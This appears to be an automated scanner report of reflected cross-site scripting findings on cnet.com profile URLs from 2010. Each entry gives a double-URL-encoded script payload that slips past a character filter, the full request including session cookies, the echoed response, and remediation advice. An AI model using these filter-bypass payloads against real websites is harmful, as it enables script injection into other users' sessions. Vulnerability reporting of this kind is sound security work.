Content-Language: en
Expires: Wed, 17 Nov 2010 00:16:22 GMT
Edge-Control: no-cache
Content-Type: text/html; charset=ISO-8859-1
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Cache-Control: no-cache
Keep-Alive: timeout=15, max=991
Connection: Keep-Alive
Content-Length: 31213

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <input type="hidden" name="profileName" value="TheAudiophiliaccdcfe"><script>alert(1)</script>c80dca6c587"/> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 37d3d%253cscript%253ealert%25281%2529%253c%252fscript%253ee9fd20021a was submitted in the REST URL parameter 2. This input was echoed as 37d3d<script>alert(1)</script>e9fd20021a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters: for example, by submitting %253c instead of the < character. The web server decodes %253c to %3c, which contains nothing the filter rejects, and the application's own second decode then turns %3c into <.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2, as the web server will already have carried out one decode. In any case, the application should perform its input validation only after all custom canonicalisation has been completed, and should HTML-encode the value at each point where it is written into the response rather than relying on the character filter alone.
Request
GET /profile/TheAudiophiliac37d3d%253cscript%253ealert%25281%2529%253c%252fscript%253ee9fd20021a/ HTTP/1.1
Host: www.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 00:16:23 GMT
Content-Language: en
Expires: Wed, 17 Nov 2010 00:16:23 GMT
Edge-Control: no-cache
Cneonction: close
Content-Type: text/html; charset=ISO-8859-1
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Cache-Control: no-cache
Keep-Alive: timeout=15, max=984
Connection: Keep-Alive
Content-Length: 31162

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <li>TheAudiophiliac37d3d<script>alert(1)</script>e9fd20021a's community profile</li> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6f650%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5de20823f4e was submitted in the REST URL parameter 2. This input was echoed as 6f650"><script>alert(1)</script>5de20823f4e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters: for example, by submitting %253c instead of the < character. The web server decodes %253c to %3c, which contains nothing the filter rejects, and the application's own second decode then turns %3c into <.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2, as the web server will already have carried out one decode. In any case, the application should perform its input validation only after all custom canonicalisation has been completed, and should HTML-encode the value at each point where it is written into the response rather than relying on the character filter alone.
Request
GET /profile/Tim+Leberecht6f650%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5de20823f4e/ HTTP/1.1
Host: www.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 00:15:25 GMT
Content-Language: en
Expires: Wed, 17 Nov 2010 00:15:25 GMT
Edge-Control: no-cache
Content-Type: text/html; charset=ISO-8859-1
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Cache-Control: no-cache
Keep-Alive: timeout=15, max=992
Connection: Keep-Alive
Content-Length: 31193

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <input type="hidden" name="profileName" value="Tim Leberecht6f650"><script>alert(1)</script>5de20823f4e"/> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 484ca%253cscript%253ealert%25281%2529%253c%252fscript%253e338945aa69 was submitted in the REST URL parameter 2. This input was echoed as 484ca<script>alert(1)</script>338945aa69 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters: for example, by submitting %253c instead of the < character. The web server decodes %253c to %3c, which contains nothing the filter rejects, and the application's own second decode then turns %3c into <.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2, as the web server will already have carried out one decode. In any case, the application should perform its input validation only after all custom canonicalisation has been completed, and should HTML-encode the value at each point where it is written into the response rather than relying on the character filter alone.
Request
GET /profile/Tim+Leberecht484ca%253cscript%253ealert%25281%2529%253c%252fscript%253e338945aa69/ HTTP/1.1
Host: www.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 00:15:27 GMT
Content-Language: en
Expires: Wed, 17 Nov 2010 00:15:27 GMT
Edge-Control: no-cache
Content-Type: text/html; charset=ISO-8859-1
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Cache-Control: no-cache
Keep-Alive: timeout=15, max=997
Connection: Keep-Alive
Content-Length: 31105

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <li>Tim Leberecht484ca<script>alert(1)</script>338945aa69's community profile</li> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 35dbe%253cscript%253ealert%25281%2529%253c%252fscript%253ebe6da4cbd2d was submitted in the REST URL parameter 2. This input was echoed as 35dbe<script>alert(1)</script>be6da4cbd2d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters: for example, by submitting %253c instead of the < character. The web server decodes %253c to %3c, which contains nothing the filter rejects, and the application's own second decode then turns %3c into <.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2, as the web server will already have carried out one decode. In any case, the application should perform its input validation only after all custom canonicalisation has been completed, and should HTML-encode the value at each point where it is written into the response rather than relying on the character filter alone.
Request
GET /profile/Tom+Krazit35dbe%253cscript%253ealert%25281%2529%253c%252fscript%253ebe6da4cbd2d/ HTTP/1.1
Host: www.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 00:09:05 GMT
Content-Language: en
Expires: Wed, 17 Nov 2010 00:09:05 GMT
Edge-Control: no-cache
Cneonction: close
Content-Type: text/html; charset=ISO-8859-1
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Cache-Control: no-cache
Keep-Alive: timeout=15, max=946
Connection: Keep-Alive
Content-Length: 31091

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <li>Tom Krazit35dbe<script>alert(1)</script>be6da4cbd2d's community profile</li> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4af34%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e0235fdf41de was submitted in the REST URL parameter 2. This input was echoed as 4af34"><script>alert(1)</script>0235fdf41de in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters: for example, by submitting %253c instead of the < character. The web server decodes %253c to %3c, which contains nothing the filter rejects, and the application's own second decode then turns %3c into <.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2, as the web server will already have carried out one decode. In any case, the application should perform its input validation only after all custom canonicalisation has been completed, and should HTML-encode the value at each point where it is written into the response rather than relying on the character filter alone.
Request
GET /profile/Tom+Krazit4af34%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e0235fdf41de/ HTTP/1.1
Host: www.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 00:09:04 GMT
Content-Language: en
Expires: Wed, 17 Nov 2010 00:09:04 GMT
Edge-Control: no-cache
Content-Type: text/html; charset=ISO-8859-1
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Cache-Control: no-cache
Keep-Alive: timeout=15, max=991
Connection: Keep-Alive
Content-Length: 31137

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <input type="hidden" name="profileName" value="Tom Krazit4af34"><script>alert(1)</script>0235fdf41de"/> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8999d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5ea4b3b9d67 was submitted in the REST URL parameter 2. This input was echoed as 8999d"><script>alert(1)</script>5ea4b3b9d67 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/Zoe+Slocum8999d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5ea4b3b9d67/ HTTP/1.1 Host: www.cnet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 00:08:43 GMT
Content-Language: en
Expires: Wed, 17 Nov 2010 00:08:44 GMT
Edge-Control: no-cache
Content-Type: text/html; charset=ISO-8859-1
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Cache-Control: no-cache
Keep-Alive: timeout=15, max=988
Connection: Keep-Alive
Content-Length: 31069
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <input type="hidden" name="profileName" value="Zoe Slocum8999d"><script>alert(1)</script>5ea4b3b9d67"/> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload fd7d4%253cscript%253ealert%25281%2529%253c%252fscript%253e0f53dea59e was submitted in the REST URL parameter 2. This input was echoed as fd7d4<script>alert(1)</script>0f53dea59e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/Zoe+Slocumfd7d4%253cscript%253ealert%25281%2529%253c%252fscript%253e0f53dea59e/ HTTP/1.1
Host: www.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 00:08:44 GMT
Content-Language: en
Expires: Wed, 17 Nov 2010 00:08:45 GMT
Edge-Control: no-cache
Content-Type: text/html; charset=ISO-8859-1
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Cache-Control: no-cache
Keep-Alive: timeout=15, max=1000
Connection: Keep-Alive
Content-Length: 31033
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <li>Zoe Slocumfd7d4<script>alert(1)</script>0f53dea59e's community profile</li> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c89f1%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e253e1aef6af was submitted in the REST URL parameter 2. This input was echoed as c89f1"><script>alert(1)</script>253e1aef6af in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/acedtectc89f1%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e253e1aef6af/ HTTP/1.1
Host: www.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 00:10:12 GMT
Content-Language: en
Expires: Wed, 17 Nov 2010 00:10:12 GMT
Edge-Control: no-cache
Content-Type: text/html; charset=ISO-8859-1
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Cache-Control: no-cache
Keep-Alive: timeout=15, max=998
Connection: Keep-Alive
Content-Length: 31067
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <input type="hidden" name="profileName" value="acedtectc89f1"><script>alert(1)</script>253e1aef6af"/> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 49d3b%253cscript%253ealert%25281%2529%253c%252fscript%253ea3c3b79517e was submitted in the REST URL parameter 2. This input was echoed as 49d3b<script>alert(1)</script>a3c3b79517e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/acedtect49d3b%253cscript%253ealert%25281%2529%253c%252fscript%253ea3c3b79517e/ HTTP/1.1
Host: www.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 00:10:13 GMT
Content-Language: en
Expires: Wed, 17 Nov 2010 00:10:13 GMT
Edge-Control: no-cache
Content-Type: text/html; charset=ISO-8859-1
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Cache-Control: no-cache
Keep-Alive: timeout=15, max=948
Connection: Keep-Alive
Content-Length: 31039
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <li>acedtect49d3b<script>alert(1)</script>a3c3b79517e's community profile</li> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b9d61%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e55fa7de4e2e was submitted in the REST URL parameter 2. This input was echoed as b9d61"><script>alert(1)</script>55fa7de4e2e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/antuan.goodwinb9d61%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e55fa7de4e2e/ HTTP/1.1
Host: www.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 00:12:04 GMT
Content-Language: en
Expires: Wed, 17 Nov 2010 00:12:04 GMT
Edge-Control: no-cache
Content-Type: text/html; charset=ISO-8859-1
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Cache-Control: no-cache
Keep-Alive: timeout=15, max=994
Connection: Keep-Alive
Content-Length: 31180
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <input type="hidden" name="profileName" value="antuan.goodwinb9d61"><script>alert(1)</script>55fa7de4e2e"/> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload b00ce%253cscript%253ealert%25281%2529%253c%252fscript%253e4f125594f0d was submitted in the REST URL parameter 2. This input was echoed as b00ce<script>alert(1)</script>4f125594f0d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
